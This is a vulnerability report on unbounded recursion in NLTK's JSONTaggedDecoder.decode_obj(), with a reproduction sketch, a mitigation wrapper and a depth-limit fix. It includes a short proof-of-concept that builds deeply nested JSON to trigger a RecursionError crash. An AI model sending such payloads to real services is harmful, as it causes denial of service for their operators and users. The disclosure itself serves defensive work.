Summary
JSONTaggedDecoder.decode_obj() in nltk/jsontags.py calls itself
recursively without any depth limit. A JSON structure nested more deeply
than sys.getrecursionlimit() allows (default: 1000) raises a
RecursionError; if the caller does not catch it, the Python process
terminates.
Affected code
File: nltk/jsontags.py, lines 47–52
@classmethod
def decode_obj(cls, obj):
    if isinstance(obj, dict):
        obj = {key: cls.decode_obj(val) for (key, val) in obj.items()}
    elif isinstance(obj, list):
        obj = list(cls.decode_obj(val) for val in obj)
Proof of Concept
import sys, json
from nltk.jsontags import JSONTaggedDecoder
depth = sys.getrecursionlimit() + 50 # e.g. 1050
payload = '{"x":' * depth + "null" + "}" * depth
# Raises RecursionError, crashing the process
json.loads(payload, cls=JSONTaggedDecoder)
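The same failure mode can be reproduced without NLTK installed. The sketch below is only an illustration: walk() is a hypothetical stand-in that mirrors the recursion pattern of decode_obj() (it is not NLTK code), and make_nested() and overflows() are helper names invented here. The nested input is built iteratively so that only the recursive walk can exhaust the stack.

```python
import sys


def walk(obj):
    # Hypothetical stand-in mirroring decode_obj's recursion pattern; not NLTK code.
    if isinstance(obj, dict):
        return {key: walk(val) for key, val in obj.items()}
    if isinstance(obj, list):
        return [walk(val) for val in obj]
    return obj


def make_nested(depth):
    # Build {"x": {"x": ... None}} with a loop, so construction never recurses.
    obj = None
    for _ in range(depth):
        obj = {"x": obj}
    return obj


def overflows(depth):
    # Report whether walking a structure of this depth exhausts the stack.
    try:
        walk(make_nested(depth))
    except RecursionError:
        return True
    return False


if __name__ == "__main__":
    print(overflows(10))
    print(overflows(sys.getrecursionlimit() + 50))
```

Any recursive walk without a depth guard behaves this way once the input nests deeper than the interpreter's recursion limit.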
Impact
Any code path that passes externally supplied JSON to
JSONTaggedDecoder is vulnerable to denial of service.
The severity depends on whether such a path exists in the
calling code (e.g. nltk/data.py).
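Until the decoder itself is patched, a caller that handles untrusted input could contain the failure at its own boundary. The following is a minimal sketch under stated assumptions: load_untrusted_json() is a hypothetical helper, not part of NLTK, and it assumes the caller prefers a ValueError over an uncaught RecursionError.

```python
import json


def load_untrusted_json(text, decoder_cls=json.JSONDecoder):
    # Hypothetical wrapper (not an NLTK API): turn stack exhaustion during
    # decoding into an ordinary, catchable ValueError.
    try:
        return json.loads(text, cls=decoder_cls)
    except RecursionError as exc:
        raise ValueError("JSON nesting too deep") from exc


if __name__ == "__main__":
    print(load_untrusted_json('{"x": [1, 2, 3]}'))
```

With NLTK installed, the decoder from the report would be passed as decoder_cls=JSONTaggedDecoder. This only limits the damage in one caller; it does not remove the unbounded recursion.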
Suggested Fix
Add a depth parameter with a hard limit:
@classmethod
def decode_obj(cls, obj, _depth=0):
    if _depth > 100:
        raise ValueError("JSON nesting too deep")
    if isinstance(obj, dict):
        obj = {key: cls.decode_obj(val, _depth + 1)
               for (key, val) in obj.items()}
    elif isinstance(obj, list):
        obj = list(cls.decode_obj(val, _depth + 1) for val in obj)
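The effect of the depth guard can be checked in isolation. The sketch below is a standalone approximation, not the NLTK implementation: decode_nested() is a hypothetical stand-in for decode_obj() with tag handling omitted, MAX_DEPTH mirrors the limit of 100 proposed above, and make_nested() is a helper invented for the example.

```python
MAX_DEPTH = 100  # same hard limit as in the suggested fix


def decode_nested(obj, _depth=0):
    # Hypothetical stand-in for decode_obj; tag handling is omitted.
    if _depth > MAX_DEPTH:
        raise ValueError("JSON nesting too deep")
    if isinstance(obj, dict):
        return {key: decode_nested(val, _depth + 1) for key, val in obj.items()}
    if isinstance(obj, list):
        return [decode_nested(val, _depth + 1) for val in obj]
    return obj


def make_nested(depth):
    # Build the nested dict with a loop, so construction never recurses.
    obj = None
    for _ in range(depth):
        obj = {"x": obj}
    return obj


if __name__ == "__main__":
    decode_nested(make_nested(100))       # at the limit: accepted
    try:
        decode_nested(make_nested(5000))  # far past the limit
    except ValueError as exc:
        print("rejected:", exc)
```

Because the guard fires after roughly a hundred frames, input nested thousands of levels deep is rejected with a ValueError well before the interpreter's recursion limit is reached.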